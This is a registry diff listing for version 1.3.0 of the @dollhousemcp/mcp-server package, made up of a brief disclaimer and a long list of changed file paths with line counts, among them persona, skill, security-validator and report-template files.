@dollhousemcp/mcp-server 1.3.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/CHANGELOG.md +132 -0
- package/LICENSE +51 -0
- package/README.md +1124 -0
- package/data/agents/code-reviewer.md +296 -0
- package/data/agents/research-assistant.md +259 -0
- package/data/agents/task-manager.md +206 -0
- package/data/ensembles/business-advisor.md +354 -0
- package/data/ensembles/creative-studio.md +288 -0
- package/data/ensembles/development-team.md +292 -0
- package/data/ensembles/security-analysis-team.md +438 -0
- package/data/memories/conversation-history.md +146 -0
- package/data/memories/learning-progress.md +376 -0
- package/data/memories/project-context.md +268 -0
- package/data/personas/business-consultant.md +50 -0
- package/data/personas/creative-writer.md +44 -0
- package/data/personas/debug-detective.md +59 -0
- package/data/personas/eli5-explainer.md +49 -0
- package/data/personas/security-analyst.md +161 -0
- package/data/personas/technical-analyst.md +43 -0
- package/data/skills/code-review.md +112 -0
- package/data/skills/creative-writing.md +174 -0
- package/data/skills/data-analysis.md +160 -0
- package/data/skills/penetration-testing.md +374 -0
- package/data/skills/research.md +181 -0
- package/data/skills/threat-modeling.md +469 -0
- package/data/skills/translation.md +148 -0
- package/data/templates/code-documentation.md +409 -0
- package/data/templates/email-professional.md +158 -0
- package/data/templates/meeting-notes.md +141 -0
- package/data/templates/penetration-test-report.md +608 -0
- package/data/templates/project-brief.md +234 -0
- package/data/templates/report-executive.md +258 -0
- package/data/templates/security-vulnerability-report.md +457 -0
- package/data/templates/threat-assessment-report.md +774 -0
- package/dist/cache/APICache.d.ts +23 -0
- package/dist/cache/APICache.d.ts.map +1 -0
- package/dist/cache/APICache.js +42 -0
- package/dist/cache/index.d.ts +5 -0
- package/dist/cache/index.d.ts.map +1 -0
- package/dist/cache/index.js +5 -0
- package/dist/collection/CollectionBrowser.d.ts +24 -0
- package/dist/collection/CollectionBrowser.d.ts.map +1 -0
- package/dist/collection/CollectionBrowser.js +120 -0
- package/dist/collection/CollectionSearch.d.ts +18 -0
- package/dist/collection/CollectionSearch.d.ts.map +1 -0
- package/dist/collection/CollectionSearch.js +48 -0
- package/dist/collection/ElementInstaller.d.ts +33 -0
- package/dist/collection/ElementInstaller.d.ts.map +1 -0
- package/dist/collection/ElementInstaller.js +142 -0
- package/dist/collection/GitHubClient.d.ts +22 -0
- package/dist/collection/GitHubClient.d.ts.map +1 -0
- package/dist/collection/GitHubClient.js +114 -0
- package/dist/collection/MarketplaceBrowser.d.ts +24 -0
- package/dist/collection/MarketplaceBrowser.d.ts.map +1 -0
- package/dist/collection/MarketplaceBrowser.js +115 -0
- package/dist/collection/MarketplaceSearch.d.ts +18 -0
- package/dist/collection/MarketplaceSearch.d.ts.map +1 -0
- package/dist/collection/MarketplaceSearch.js +48 -0
- package/dist/collection/PersonaDetails.d.ts +22 -0
- package/dist/collection/PersonaDetails.d.ts.map +1 -0
- package/dist/collection/PersonaDetails.js +71 -0
- package/dist/collection/PersonaInstaller.d.ts +26 -0
- package/dist/collection/PersonaInstaller.d.ts.map +1 -0
- package/dist/collection/PersonaInstaller.js +103 -0
- package/dist/collection/PersonaSubmitter.d.ts +19 -0
- package/dist/collection/PersonaSubmitter.d.ts.map +1 -0
- package/dist/collection/PersonaSubmitter.js +57 -0
- package/dist/collection/index.d.ts +10 -0
- package/dist/collection/index.d.ts.map +1 -0
- package/dist/collection/index.js +10 -0
- package/dist/config/constants.d.ts +25 -0
- package/dist/config/constants.d.ts.map +1 -0
- package/dist/config/constants.js +34 -0
- package/dist/config/index.d.ts +6 -0
- package/dist/config/index.d.ts.map +1 -0
- package/dist/config/index.js +6 -0
- package/dist/config/indicator-config.d.ts +107 -0
- package/dist/config/indicator-config.d.ts.map +1 -0
- package/dist/config/indicator-config.js +158 -0
- package/dist/constants/defaultPersonas.d.ts +10 -0
- package/dist/constants/defaultPersonas.d.ts.map +1 -0
- package/dist/constants/defaultPersonas.js +18 -0
- package/dist/constants/limits.d.ts +10 -0
- package/dist/constants/limits.d.ts.map +1 -0
- package/dist/constants/limits.js +13 -0
- package/dist/elements/BaseElement.d.ts +81 -0
- package/dist/elements/BaseElement.d.ts.map +1 -0
- package/dist/elements/BaseElement.js +381 -0
- package/dist/elements/FeedbackProcessor.d.ts +57 -0
- package/dist/elements/FeedbackProcessor.d.ts.map +1 -0
- package/dist/elements/FeedbackProcessor.js +418 -0
- package/dist/elements/agents/Agent.d.ts +145 -0
- package/dist/elements/agents/Agent.d.ts.map +1 -0
- package/dist/elements/agents/Agent.js +848 -0
- package/dist/elements/agents/AgentManager.d.ts +125 -0
- package/dist/elements/agents/AgentManager.d.ts.map +1 -0
- package/dist/elements/agents/AgentManager.js +615 -0
- package/dist/elements/agents/constants.d.ts +42 -0
- package/dist/elements/agents/constants.d.ts.map +1 -0
- package/dist/elements/agents/constants.js +45 -0
- package/dist/elements/agents/goalTemplates.d.ts +44 -0
- package/dist/elements/agents/goalTemplates.d.ts.map +1 -0
- package/dist/elements/agents/goalTemplates.js +297 -0
- package/dist/elements/agents/index.d.ts +8 -0
- package/dist/elements/agents/index.d.ts.map +1 -0
- package/dist/elements/agents/index.js +8 -0
- package/dist/elements/agents/ruleEngineConfig.d.ts +76 -0
- package/dist/elements/agents/ruleEngineConfig.d.ts.map +1 -0
- package/dist/elements/agents/ruleEngineConfig.js +143 -0
- package/dist/elements/agents/types.d.ts +97 -0
- package/dist/elements/agents/types.d.ts.map +1 -0
- package/dist/elements/agents/types.js +5 -0
- package/dist/elements/ensembles/Ensemble.d.ts +144 -0
- package/dist/elements/ensembles/Ensemble.d.ts.map +1 -0
- package/dist/elements/ensembles/Ensemble.js +860 -0
- package/dist/elements/ensembles/EnsembleManager.d.ts +85 -0
- package/dist/elements/ensembles/EnsembleManager.d.ts.map +1 -0
- package/dist/elements/ensembles/EnsembleManager.js +378 -0
- package/dist/elements/ensembles/constants.d.ts +73 -0
- package/dist/elements/ensembles/constants.d.ts.map +1 -0
- package/dist/elements/ensembles/constants.js +92 -0
- package/dist/elements/ensembles/index.d.ts +8 -0
- package/dist/elements/ensembles/index.d.ts.map +1 -0
- package/dist/elements/ensembles/index.js +8 -0
- package/dist/elements/ensembles/types.d.ts +92 -0
- package/dist/elements/ensembles/types.d.ts.map +1 -0
- package/dist/elements/ensembles/types.js +8 -0
- package/dist/elements/index.d.ts +11 -0
- package/dist/elements/index.d.ts.map +1 -0
- package/dist/elements/index.js +12 -0
- package/dist/elements/memories/Memory.d.ts +110 -0
- package/dist/elements/memories/Memory.d.ts.map +1 -0
- package/dist/elements/memories/Memory.js +470 -0
- package/dist/elements/memories/MemoryManager.d.ts +86 -0
- package/dist/elements/memories/MemoryManager.d.ts.map +1 -0
- package/dist/elements/memories/MemoryManager.js +435 -0
- package/dist/elements/memories/constants.d.ts +42 -0
- package/dist/elements/memories/constants.d.ts.map +1 -0
- package/dist/elements/memories/constants.js +49 -0
- package/dist/elements/memories/index.d.ts +6 -0
- package/dist/elements/memories/index.d.ts.map +1 -0
- package/dist/elements/memories/index.js +6 -0
- package/dist/elements/skills/Skill.d.ts +109 -0
- package/dist/elements/skills/Skill.d.ts.map +1 -0
- package/dist/elements/skills/Skill.js +381 -0
- package/dist/elements/skills/index.d.ts +5 -0
- package/dist/elements/skills/index.d.ts.map +1 -0
- package/dist/elements/skills/index.js +5 -0
- package/dist/elements/templates/Template.d.ts +138 -0
- package/dist/elements/templates/Template.d.ts.map +1 -0
- package/dist/elements/templates/Template.js +673 -0
- package/dist/elements/templates/TemplateManager.d.ts +104 -0
- package/dist/elements/templates/TemplateManager.d.ts.map +1 -0
- package/dist/elements/templates/TemplateManager.js +501 -0
- package/dist/elements/templates/index.d.ts +6 -0
- package/dist/elements/templates/index.d.ts.map +1 -0
- package/dist/elements/templates/index.js +6 -0
- package/dist/errors/SecurityError.d.ts +29 -0
- package/dist/errors/SecurityError.d.ts.map +1 -0
- package/dist/errors/SecurityError.js +47 -0
- package/dist/errors/index.d.ts +2 -0
- package/dist/errors/index.d.ts.map +1 -0
- package/dist/errors/index.js +2 -0
- package/dist/index.barrel.d.ts +21 -0
- package/dist/index.barrel.d.ts.map +1 -0
- package/dist/index.barrel.js +31 -0
- package/dist/index.d.ts +223 -0
- package/dist/index.d.ts.map +1 -0
- package/dist/index.js +1606 -0
- package/dist/marketplace/GitHubClient.d.ts +22 -0
- package/dist/marketplace/GitHubClient.d.ts.map +1 -0
- package/dist/marketplace/GitHubClient.js +112 -0
- package/dist/marketplace/MarketplaceBrowser.d.ts +24 -0
- package/dist/marketplace/MarketplaceBrowser.d.ts.map +1 -0
- package/dist/marketplace/MarketplaceBrowser.js +115 -0
- package/dist/marketplace/MarketplaceSearch.d.ts +18 -0
- package/dist/marketplace/MarketplaceSearch.d.ts.map +1 -0
- package/dist/marketplace/MarketplaceSearch.js +48 -0
- package/dist/marketplace/PersonaDetails.d.ts +22 -0
- package/dist/marketplace/PersonaDetails.d.ts.map +1 -0
- package/dist/marketplace/PersonaDetails.js +71 -0
- package/dist/marketplace/PersonaInstaller.d.ts +25 -0
- package/dist/marketplace/PersonaInstaller.d.ts.map +1 -0
- package/dist/marketplace/PersonaInstaller.js +100 -0
- package/dist/marketplace/PersonaSubmitter.d.ts +19 -0
- package/dist/marketplace/PersonaSubmitter.d.ts.map +1 -0
- package/dist/marketplace/PersonaSubmitter.js +57 -0
- package/dist/marketplace/index.d.ts +10 -0
- package/dist/marketplace/index.d.ts.map +1 -0
- package/dist/marketplace/index.js +10 -0
- package/dist/persona/PersonaElement.d.ts +64 -0
- package/dist/persona/PersonaElement.d.ts.map +1 -0
- package/dist/persona/PersonaElement.js +223 -0
- package/dist/persona/PersonaElementManager.d.ts +97 -0
- package/dist/persona/PersonaElementManager.d.ts.map +1 -0
- package/dist/persona/PersonaElementManager.js +348 -0
- package/dist/persona/PersonaLoader.d.ts +34 -0
- package/dist/persona/PersonaLoader.d.ts.map +1 -0
- package/dist/persona/PersonaLoader.js +145 -0
- package/dist/persona/PersonaManager.d.ts +112 -0
- package/dist/persona/PersonaManager.d.ts.map +1 -0
- package/dist/persona/PersonaManager.js +341 -0
- package/dist/persona/PersonaValidator.d.ts +39 -0
- package/dist/persona/PersonaValidator.d.ts.map +1 -0
- package/dist/persona/PersonaValidator.js +161 -0
- package/dist/persona/export-import/PersonaExporter.d.ts +43 -0
- package/dist/persona/export-import/PersonaExporter.d.ts.map +1 -0
- package/dist/persona/export-import/PersonaExporter.js +99 -0
- package/dist/persona/export-import/PersonaImporter.d.ts +65 -0
- package/dist/persona/export-import/PersonaImporter.d.ts.map +1 -0
- package/dist/persona/export-import/PersonaImporter.js +315 -0
- package/dist/persona/export-import/PersonaSharer.d.ts +60 -0
- package/dist/persona/export-import/PersonaSharer.d.ts.map +1 -0
- package/dist/persona/export-import/PersonaSharer.js +502 -0
- package/dist/persona/export-import/index.d.ts +10 -0
- package/dist/persona/export-import/index.d.ts.map +1 -0
- package/dist/persona/export-import/index.js +7 -0
- package/dist/persona/index.d.ts +7 -0
- package/dist/persona/index.d.ts.map +1 -0
- package/dist/persona/index.js +7 -0
- package/dist/portfolio/MigrationManager.d.ts +44 -0
- package/dist/portfolio/MigrationManager.d.ts.map +1 -0
- package/dist/portfolio/MigrationManager.js +163 -0
- package/dist/portfolio/PortfolioManager.d.ts +54 -0
- package/dist/portfolio/PortfolioManager.d.ts.map +1 -0
- package/dist/portfolio/PortfolioManager.js +224 -0
- package/dist/portfolio/types.d.ts +18 -0
- package/dist/portfolio/types.d.ts.map +1 -0
- package/dist/portfolio/types.js +13 -0
- package/dist/security/InputValidator.d.ts +80 -0
- package/dist/security/InputValidator.d.ts.map +1 -0
- package/dist/security/InputValidator.js +448 -0
- package/dist/security/audit/SecurityAuditor.d.ts +44 -0
- package/dist/security/audit/SecurityAuditor.d.ts.map +1 -0
- package/dist/security/audit/SecurityAuditor.js +274 -0
- package/dist/security/audit/config/suppressions.d.ts +34 -0
- package/dist/security/audit/config/suppressions.d.ts.map +1 -0
- package/dist/security/audit/config/suppressions.js +575 -0
- package/dist/security/audit/index.d.ts +14 -0
- package/dist/security/audit/index.d.ts.map +1 -0
- package/dist/security/audit/index.js +15 -0
- package/dist/security/audit/reporters/ConsoleReporter.d.ts +46 -0
- package/dist/security/audit/reporters/ConsoleReporter.d.ts.map +1 -0
- package/dist/security/audit/reporters/ConsoleReporter.js +174 -0
- package/dist/security/audit/reporters/JsonReporter.d.ts +13 -0
- package/dist/security/audit/reporters/JsonReporter.d.ts.map +1 -0
- package/dist/security/audit/reporters/JsonReporter.js +25 -0
- package/dist/security/audit/reporters/MarkdownReporter.d.ts +13 -0
- package/dist/security/audit/reporters/MarkdownReporter.d.ts.map +1 -0
- package/dist/security/audit/reporters/MarkdownReporter.js +79 -0
- package/dist/security/audit/rules/SecurityRules.d.ts +20 -0
- package/dist/security/audit/rules/SecurityRules.d.ts.map +1 -0
- package/dist/security/audit/rules/SecurityRules.js +244 -0
- package/dist/security/audit/scanners/CodeScanner.d.ts +47 -0
- package/dist/security/audit/scanners/CodeScanner.d.ts.map +1 -0
- package/dist/security/audit/scanners/CodeScanner.js +174 -0
- package/dist/security/audit/scanners/ConfigurationScanner.d.ts +13 -0
- package/dist/security/audit/scanners/ConfigurationScanner.d.ts.map +1 -0
- package/dist/security/audit/scanners/ConfigurationScanner.js +22 -0
- package/dist/security/audit/scanners/DependencyScanner.d.ts +13 -0
- package/dist/security/audit/scanners/DependencyScanner.d.ts.map +1 -0
- package/dist/security/audit/scanners/DependencyScanner.js +22 -0
- package/dist/security/audit/types.d.ts +94 -0
- package/dist/security/audit/types.d.ts.map +1 -0
- package/dist/security/audit/types.js +6 -0
- package/dist/security/commandValidator.d.ts +7 -0
- package/dist/security/commandValidator.d.ts.map +1 -0
- package/dist/security/commandValidator.js +78 -0
- package/dist/security/constants.d.ts +24 -0
- package/dist/security/constants.d.ts.map +1 -0
- package/dist/security/constants.js +26 -0
- package/dist/security/contentValidator.d.ts +47 -0
- package/dist/security/contentValidator.d.ts.map +1 -0
- package/dist/security/contentValidator.js +301 -0
- package/dist/security/errorHandler.d.ts +42 -0
- package/dist/security/errorHandler.d.ts.map +1 -0
- package/dist/security/errorHandler.js +166 -0
- package/dist/security/errors.d.ts +14 -0
- package/dist/security/errors.d.ts.map +1 -0
- package/dist/security/errors.js +28 -0
- package/dist/security/fileLockManager.d.ts +70 -0
- package/dist/security/fileLockManager.d.ts.map +1 -0
- package/dist/security/fileLockManager.js +187 -0
- package/dist/security/index.d.ts +12 -0
- package/dist/security/index.d.ts.map +1 -0
- package/dist/security/index.js +14 -0
- package/dist/security/pathValidator.d.ts +9 -0
- package/dist/security/pathValidator.d.ts.map +1 -0
- package/dist/security/pathValidator.js +102 -0
- package/dist/security/regexValidator.d.ts +59 -0
- package/dist/security/regexValidator.d.ts.map +1 -0
- package/dist/security/regexValidator.js +214 -0
- package/dist/security/secureYamlParser.d.ts +46 -0
- package/dist/security/secureYamlParser.d.ts.map +1 -0
- package/dist/security/secureYamlParser.js +203 -0
- package/dist/security/securityMonitor.d.ts +58 -0
- package/dist/security/securityMonitor.d.ts.map +1 -0
- package/dist/security/securityMonitor.js +108 -0
- package/dist/security/tokenManager.d.ts +85 -0
- package/dist/security/tokenManager.d.ts.map +1 -0
- package/dist/security/tokenManager.js +286 -0
- package/dist/security/validators/unicodeValidator.d.ts +97 -0
- package/dist/security/validators/unicodeValidator.d.ts.map +1 -0
- package/dist/security/validators/unicodeValidator.js +312 -0
- package/dist/security/yamlValidator.d.ts +21 -0
- package/dist/security/yamlValidator.d.ts.map +1 -0
- package/dist/security/yamlValidator.js +164 -0
- package/dist/server/ServerSetup.d.ts +35 -0
- package/dist/server/ServerSetup.d.ts.map +1 -0
- package/dist/server/ServerSetup.js +116 -0
- package/dist/server/index.d.ts +7 -0
- package/dist/server/index.d.ts.map +1 -0
- package/dist/server/index.js +7 -0
- package/dist/server/startup.d.ts +31 -0
- package/dist/server/startup.d.ts.map +1 -0
- package/dist/server/startup.js +67 -0
- package/dist/server/tools/CollectionTools.d.ts +10 -0
- package/dist/server/tools/CollectionTools.d.ts.map +1 -0
- package/dist/server/tools/CollectionTools.js +96 -0
- package/dist/server/tools/ConfigTools.d.ts +10 -0
- package/dist/server/tools/ConfigTools.d.ts.map +1 -0
- package/dist/server/tools/ConfigTools.js +63 -0
- package/dist/server/tools/MarketplaceTools.d.ts +10 -0
- package/dist/server/tools/MarketplaceTools.d.ts.map +1 -0
- package/dist/server/tools/MarketplaceTools.js +96 -0
- package/dist/server/tools/PersonaTools.d.ts +10 -0
- package/dist/server/tools/PersonaTools.d.ts.map +1 -0
- package/dist/server/tools/PersonaTools.js +257 -0
- package/dist/server/tools/ToolRegistry.d.ts +37 -0
- package/dist/server/tools/ToolRegistry.d.ts.map +1 -0
- package/dist/server/tools/ToolRegistry.js +40 -0
- package/dist/server/tools/UpdateTools.d.ts +10 -0
- package/dist/server/tools/UpdateTools.d.ts.map +1 -0
- package/dist/server/tools/UpdateTools.js +64 -0
- package/dist/server/tools/UserTools.d.ts +10 -0
- package/dist/server/tools/UserTools.d.ts.map +1 -0
- package/dist/server/tools/UserTools.js +51 -0
- package/dist/server/tools/index.d.ts +10 -0
- package/dist/server/tools/index.d.ts.map +1 -0
- package/dist/server/tools/index.js +10 -0
- package/dist/server/types.d.ts +34 -0
- package/dist/server/types.d.ts.map +1 -0
- package/dist/server/types.js +5 -0
- package/dist/src/cache/APICache.d.ts +23 -0
- package/dist/src/cache/APICache.d.ts.map +1 -0
- package/dist/src/cache/APICache.js +42 -0
- package/dist/src/cache/index.d.ts +5 -0
- package/dist/src/cache/index.d.ts.map +1 -0
- package/dist/src/cache/index.js +5 -0
- package/dist/src/config/constants.d.ts +25 -0
- package/dist/src/config/constants.d.ts.map +1 -0
- package/dist/src/config/constants.js +30 -0
- package/dist/src/config/index.d.ts +6 -0
- package/dist/src/config/index.d.ts.map +1 -0
- package/dist/src/config/index.js +6 -0
- package/dist/src/config/indicator-config.d.ts +107 -0
- package/dist/src/config/indicator-config.d.ts.map +1 -0
- package/dist/src/config/indicator-config.js +158 -0
- package/dist/src/constants/defaultPersonas.d.ts +10 -0
- package/dist/src/constants/defaultPersonas.d.ts.map +1 -0
- package/dist/src/constants/defaultPersonas.js +18 -0
- package/dist/src/constants/limits.d.ts +10 -0
- package/dist/src/constants/limits.d.ts.map +1 -0
- package/dist/src/constants/limits.js +13 -0
- package/dist/src/errors/SecurityError.d.ts +29 -0
- package/dist/src/errors/SecurityError.d.ts.map +1 -0
- package/dist/src/errors/SecurityError.js +47 -0
- package/dist/src/errors/index.d.ts +2 -0
- package/dist/src/errors/index.d.ts.map +1 -0
- package/dist/src/errors/index.js +2 -0
- package/dist/src/index.barrel.d.ts +21 -0
- package/dist/src/index.barrel.d.ts.map +1 -0
- package/dist/src/index.barrel.js +31 -0
- package/dist/src/index.d.ts +220 -0
- package/dist/src/index.d.ts.map +1 -0
- package/dist/src/index.js +1559 -0
- package/dist/src/marketplace/GitHubClient.d.ts +22 -0
- package/dist/src/marketplace/GitHubClient.d.ts.map +1 -0
- package/dist/src/marketplace/GitHubClient.js +112 -0
- package/dist/src/marketplace/MarketplaceBrowser.d.ts +21 -0
- package/dist/src/marketplace/MarketplaceBrowser.d.ts.map +1 -0
- package/dist/src/marketplace/MarketplaceBrowser.js +45 -0
- package/dist/src/marketplace/MarketplaceSearch.d.ts +18 -0
- package/dist/src/marketplace/MarketplaceSearch.d.ts.map +1 -0
- package/dist/src/marketplace/MarketplaceSearch.js +36 -0
- package/dist/src/marketplace/PersonaDetails.d.ts +22 -0
- package/dist/src/marketplace/PersonaDetails.d.ts.map +1 -0
- package/dist/src/marketplace/PersonaDetails.js +71 -0
- package/dist/src/marketplace/PersonaInstaller.d.ts +25 -0
- package/dist/src/marketplace/PersonaInstaller.d.ts.map +1 -0
- package/dist/src/marketplace/PersonaInstaller.js +100 -0
- package/dist/src/marketplace/PersonaSubmitter.d.ts +19 -0
- package/dist/src/marketplace/PersonaSubmitter.d.ts.map +1 -0
- package/dist/src/marketplace/PersonaSubmitter.js +57 -0
- package/dist/src/marketplace/index.d.ts +10 -0
- package/dist/src/marketplace/index.d.ts.map +1 -0
- package/dist/src/marketplace/index.js +10 -0
- package/dist/src/persona/PersonaLoader.d.ts +33 -0
- package/dist/src/persona/PersonaLoader.d.ts.map +1 -0
- package/dist/src/persona/PersonaLoader.js +139 -0
- package/dist/src/persona/PersonaManager.d.ts +112 -0
- package/dist/src/persona/PersonaManager.d.ts.map +1 -0
- package/dist/src/persona/PersonaManager.js +341 -0
- package/dist/src/persona/PersonaValidator.d.ts +33 -0
- package/dist/src/persona/PersonaValidator.d.ts.map +1 -0
- package/dist/src/persona/PersonaValidator.js +157 -0
- package/dist/src/persona/export-import/PersonaExporter.d.ts +43 -0
- package/dist/src/persona/export-import/PersonaExporter.d.ts.map +1 -0
- package/dist/src/persona/export-import/PersonaExporter.js +99 -0
- package/dist/src/persona/export-import/PersonaImporter.d.ts +65 -0
- package/dist/src/persona/export-import/PersonaImporter.d.ts.map +1 -0
- package/dist/src/persona/export-import/PersonaImporter.js +313 -0
- package/dist/src/persona/export-import/PersonaSharer.d.ts +60 -0
- package/dist/src/persona/export-import/PersonaSharer.d.ts.map +1 -0
- package/dist/src/persona/export-import/PersonaSharer.js +363 -0
- package/dist/src/persona/export-import/index.d.ts +10 -0
- package/dist/src/persona/export-import/index.d.ts.map +1 -0
- package/dist/src/persona/export-import/index.js +7 -0
- package/dist/src/persona/index.d.ts +7 -0
- package/dist/src/persona/index.d.ts.map +1 -0
- package/dist/src/persona/index.js +7 -0
- package/dist/src/security/InputValidator.d.ts +69 -0
- package/dist/src/security/InputValidator.d.ts.map +1 -0
- package/dist/src/security/InputValidator.js +381 -0
- package/dist/src/security/commandValidator.d.ts +7 -0
- package/dist/src/security/commandValidator.d.ts.map +1 -0
- package/dist/src/security/commandValidator.js +77 -0
- package/dist/src/security/constants.d.ts +21 -0
- package/dist/src/security/constants.d.ts.map +1 -0
- package/dist/src/security/constants.js +23 -0
- package/dist/src/security/contentValidator.d.ts +47 -0
- package/dist/src/security/contentValidator.d.ts.map +1 -0
- package/dist/src/security/contentValidator.js +188 -0
- package/dist/src/security/fileLockManager.d.ts +70 -0
- package/dist/src/security/fileLockManager.d.ts.map +1 -0
- package/dist/src/security/fileLockManager.js +187 -0
- package/dist/src/security/index.d.ts +12 -0
- package/dist/src/security/index.d.ts.map +1 -0
- package/dist/src/security/index.js +14 -0
- package/dist/src/security/pathValidator.d.ts +9 -0
- package/dist/src/security/pathValidator.d.ts.map +1 -0
- package/dist/src/security/pathValidator.js +97 -0
- package/dist/src/security/secureYamlParser.d.ts +46 -0
- package/dist/src/security/secureYamlParser.d.ts.map +1 -0
- package/dist/src/security/secureYamlParser.js +203 -0
- package/dist/src/security/securityMonitor.d.ts +58 -0
- package/dist/src/security/securityMonitor.d.ts.map +1 -0
- package/dist/src/security/securityMonitor.js +108 -0
- package/dist/src/security/tokenManager.d.ts +59 -0
- package/dist/src/security/tokenManager.d.ts.map +1 -0
- package/dist/src/security/tokenManager.js +216 -0
- package/dist/src/security/yamlValidator.d.ts +20 -0
- package/dist/src/security/yamlValidator.d.ts.map +1 -0
- package/dist/src/security/yamlValidator.js +138 -0
- package/dist/src/server/ServerSetup.d.ts +31 -0
- package/dist/src/server/ServerSetup.d.ts.map +1 -0
- package/dist/src/server/ServerSetup.js +79 -0
- package/dist/src/server/index.d.ts +7 -0
- package/dist/src/server/index.d.ts.map +1 -0
- package/dist/src/server/index.js +7 -0
- package/dist/src/server/tools/ConfigTools.d.ts +10 -0
- package/dist/src/server/tools/ConfigTools.d.ts.map +1 -0
- package/dist/src/server/tools/ConfigTools.js +63 -0
- package/dist/src/server/tools/MarketplaceTools.d.ts +10 -0
- package/dist/src/server/tools/MarketplaceTools.d.ts.map +1 -0
- package/dist/src/server/tools/MarketplaceTools.js +92 -0
- package/dist/src/server/tools/PersonaTools.d.ts +10 -0
- package/dist/src/server/tools/PersonaTools.d.ts.map +1 -0
- package/dist/src/server/tools/PersonaTools.js +257 -0
- package/dist/src/server/tools/ToolRegistry.d.ts +37 -0
- package/dist/src/server/tools/ToolRegistry.d.ts.map +1 -0
- package/dist/src/server/tools/ToolRegistry.js +40 -0
- package/dist/src/server/tools/UpdateTools.d.ts +10 -0
- package/dist/src/server/tools/UpdateTools.d.ts.map +1 -0
- package/dist/src/server/tools/UpdateTools.js +64 -0
- package/dist/src/server/tools/UserTools.d.ts +10 -0
- package/dist/src/server/tools/UserTools.d.ts.map +1 -0
- package/dist/src/server/tools/UserTools.js +51 -0
- package/dist/src/server/tools/index.d.ts +10 -0
- package/dist/src/server/tools/index.d.ts.map +1 -0
- package/dist/src/server/tools/index.js +10 -0
- package/dist/src/server/types.d.ts +34 -0
- package/dist/src/server/types.d.ts.map +1 -0
- package/dist/src/server/types.js +5 -0
- package/dist/src/tools/debug.d.ts +20 -0
- package/dist/src/tools/debug.d.ts.map +1 -0
- package/dist/src/tools/debug.js +37 -0
- package/dist/src/types/cache.d.ts +8 -0
- package/dist/src/types/cache.d.ts.map +1 -0
- package/dist/src/types/cache.js +5 -0
- package/dist/src/types/index.d.ts +8 -0
- package/dist/src/types/index.d.ts.map +1 -0
- package/dist/src/types/index.js +8 -0
- package/dist/src/types/marketplace.d.ts +23 -0
- package/dist/src/types/marketplace.d.ts.map +1 -0
- package/dist/src/types/marketplace.js +5 -0
- package/dist/src/types/mcp.d.ts +161 -0
- package/dist/src/types/mcp.d.ts.map +1 -0
- package/dist/src/types/mcp.js +75 -0
- package/dist/src/types/persona.d.ts +30 -0
- package/dist/src/types/persona.d.ts.map +1 -0
- package/dist/src/types/persona.js +5 -0
- package/dist/src/update/BackupManager.d.ts +46 -0
- package/dist/src/update/BackupManager.d.ts.map +1 -0
- package/dist/src/update/BackupManager.js +261 -0
- package/dist/src/update/DependencyChecker.d.ts +41 -0
- package/dist/src/update/DependencyChecker.d.ts.map +1 -0
- package/dist/src/update/DependencyChecker.js +132 -0
- package/dist/src/update/RateLimiter.d.ts +80 -0
- package/dist/src/update/RateLimiter.d.ts.map +1 -0
- package/dist/src/update/RateLimiter.js +172 -0
- package/dist/src/update/SignatureVerifier.d.ts +71 -0
- package/dist/src/update/SignatureVerifier.d.ts.map +1 -0
- package/dist/src/update/SignatureVerifier.js +214 -0
- package/dist/src/update/UpdateChecker.d.ts +127 -0
- package/dist/src/update/UpdateChecker.d.ts.map +1 -0
- package/dist/src/update/UpdateChecker.js +460 -0
- package/dist/src/update/UpdateManager.d.ts +41 -0
- package/dist/src/update/UpdateManager.d.ts.map +1 -0
- package/dist/src/update/UpdateManager.js +260 -0
- package/dist/src/update/VersionManager.d.ts +31 -0
- package/dist/src/update/VersionManager.d.ts.map +1 -0
- package/dist/src/update/VersionManager.js +134 -0
- package/dist/src/update/index.d.ts +9 -0
- package/dist/src/update/index.d.ts.map +1 -0
- package/dist/src/update/index.js +9 -0
- package/dist/src/utils/filesystem.d.ts +32 -0
- package/dist/src/utils/filesystem.d.ts.map +1 -0
- package/dist/src/utils/filesystem.js +73 -0
- package/dist/src/utils/git.d.ts +32 -0
- package/dist/src/utils/git.d.ts.map +1 -0
- package/dist/src/utils/git.js +65 -0
- package/dist/src/utils/index.d.ts +7 -0
- package/dist/src/utils/index.d.ts.map +1 -0
- package/dist/src/utils/index.js +7 -0
- package/dist/src/utils/logger.d.ts +45 -0
- package/dist/src/utils/logger.d.ts.map +1 -0
- package/dist/src/utils/logger.js +91 -0
- package/dist/src/utils/version.d.ts +25 -0
- package/dist/src/utils/version.d.ts.map +1 -0
- package/dist/src/utils/version.js +97 -0
- package/dist/test/src/cache/APICache.d.ts +23 -0
- package/dist/test/src/cache/APICache.d.ts.map +1 -0
- package/dist/test/src/cache/APICache.js +42 -0
- package/dist/test/src/cache/index.d.ts +5 -0
- package/dist/test/src/cache/index.d.ts.map +1 -0
- package/dist/test/src/cache/index.js +5 -0
- package/dist/test/src/collection/CollectionBrowser.d.ts +24 -0
- package/dist/test/src/collection/CollectionBrowser.d.ts.map +1 -0
- package/dist/test/src/collection/CollectionBrowser.js +115 -0
- package/dist/test/src/collection/CollectionSearch.d.ts +18 -0
- package/dist/test/src/collection/CollectionSearch.d.ts.map +1 -0
- package/dist/test/src/collection/CollectionSearch.js +48 -0
- package/dist/test/src/collection/GitHubClient.d.ts +22 -0
- package/dist/test/src/collection/GitHubClient.d.ts.map +1 -0
- package/dist/test/src/collection/GitHubClient.js +114 -0
- package/dist/test/src/collection/PersonaDetails.d.ts +22 -0
- package/dist/test/src/collection/PersonaDetails.d.ts.map +1 -0
- package/dist/test/src/collection/PersonaDetails.js +71 -0
- package/dist/test/src/collection/PersonaInstaller.d.ts +26 -0
- package/dist/test/src/collection/PersonaInstaller.d.ts.map +1 -0
- package/dist/test/src/collection/PersonaInstaller.js +103 -0
- package/dist/test/src/collection/PersonaSubmitter.d.ts +19 -0
- package/dist/test/src/collection/PersonaSubmitter.d.ts.map +1 -0
- package/dist/test/src/collection/PersonaSubmitter.js +57 -0
- package/dist/test/src/collection/index.d.ts +10 -0
- package/dist/test/src/collection/index.d.ts.map +1 -0
- package/dist/test/src/collection/index.js +10 -0
- package/dist/test/src/config/constants.d.ts +25 -0
- package/dist/test/src/config/constants.d.ts.map +1 -0
- package/dist/test/src/config/constants.js +30 -0
- package/dist/test/src/config/index.d.ts +6 -0
- package/dist/test/src/config/index.d.ts.map +1 -0
- package/dist/test/src/config/index.js +6 -0
- package/dist/test/src/config/indicator-config.d.ts +107 -0
